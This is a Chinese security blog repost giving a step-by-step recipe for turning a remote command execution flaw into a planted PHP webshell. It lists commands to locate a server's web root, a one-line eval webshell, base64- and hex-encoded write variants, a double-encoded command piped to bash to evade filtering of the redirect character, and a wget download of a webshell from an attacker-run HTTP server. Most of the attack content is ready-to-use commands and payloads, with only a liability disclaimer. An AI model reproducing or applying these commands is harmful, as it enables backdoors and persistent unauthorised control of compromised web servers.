RCE写webshell总结

admin 2023年2月9日09:15:47评论89 views字数 1900阅读6分20秒阅读模式

免责声明

由于传播、利用本公众号夜组安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号夜组安全及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!


RCE写webshell总结
RCE写webshell总结

RCE写webshell

RCE写webshell总结
RCE写webshell总结

01

前言


当我们找到一个rce漏洞却无法反弹shell时,在web路径写webshell用连接工具进行管理会方便的多,本文总结从命令执行到webshell的流程化操作。


02

寻找Web路径


写webshell当然要写在web路径,第一步要做的就是快速寻找web路径


1.文件查找法

一般web路径一定会有index.htmlphpjspasp,login.xxx文件。可以根据已知页面文件名全局搜索

linux:find / -name index.phpfind / -name index.*windows:for /r d:/ %i in (index.html) do @echo %ifor /r d:/ %i in (index.*) do @echo %i


2.源码查找法

也可以选择打开当前已知web页面的f12查看源码,寻找一段特征足够明显的源码进行查找

linux:find / -name "*.*" | xargs grep "PHP installed properly"find /var/www/ -name "*.php" | xargs grep "doServerTest()"
windows:findstr /s/i/n /d:D:sec_tools /c:"html" *.htmlfindstr /s/i/n /d:C:windows /c:"success" *.*


3.history等

通过linux历史命令查找web相关的服务启动命令

history | grep nginxhistory | grep tomcathistory | grep http

03

写入webshell


确认寻找到的路径有写入权限之后,就可以开始写webshell了


1.echo直接写入

echo '<?php eval($_POST[1]); ?>' > 1.php

直接写入webshell一般不会成功,因为webshell中使用的某些关键符号可能被转码或屏蔽


2.base64写入

echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >2.php

使用base64是比较通用的方法,完美去除了webshell本身的特殊字符


3.绕过重定向符

echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | bash
echo "ZWNobyAiUEQ5d2FIQWdaWFpoYkNna1gxQlBVMVJiTVYwcE95QS9QZz09IiB8IGJhc2U2NCAtZCA+My5waHA=" | base64 -d | sh

重定向符>不可用时,我们可以将1或2中的整体命令base64编码,然后解码后通过bash或sh执行


其他字符绕过方式,如空格对应${IFS}等,可参考命令注入的绕过方式 http://uuzdaisuki.com/2020/07/15/%E5%91%BD%E4%BB%A4%E6%B3%A8%E5%85%A5%E7%BB%95%E8%BF%87%E6%96%B9%E5%BC%8F%E6%80%BB%E7%BB%93/


4.远端下载webshell

远端服务器放置webshell,开启httppython -m http.server
目标机器执行wget http://xx.xx.xxx.xx:8000/xxx.php

可出网且有wget的情况下可采用此方式


5.hex写入

hex写入与base64写入相似,在 https://www.107000.com/T-Hex/
将webshell编码成hex,使用xxd命令还原

或在使用前将webshell使用xxd生成hex数据

echo '<?php eval($_POST[1]); ?>' |xxd -ps

然后命令注入执行

echo 3C3F706870206576616C28245F504F53545B315D293B203F3E|xxd -r -ps > 5.php

04

参考链接

文章作者:Leticia's Blog

原文链接:https://uuzdaisuki.com/


05

往期回顾

RCE写webshell总结

记一次在演习中攻防角色反复横跳

RCE写webshell总结

WebLogic弱口令getshell

RCE写webshell总结

圈子祝大家元宵节快乐!一次进入终身免费

原文始发于微信公众号(夜组安全):RCE写webshell总结

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月9日09:15:47
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   RCE写webshell总结http://cn-sec.com/archives/1544242.html

发表评论

匿名网友 填写信息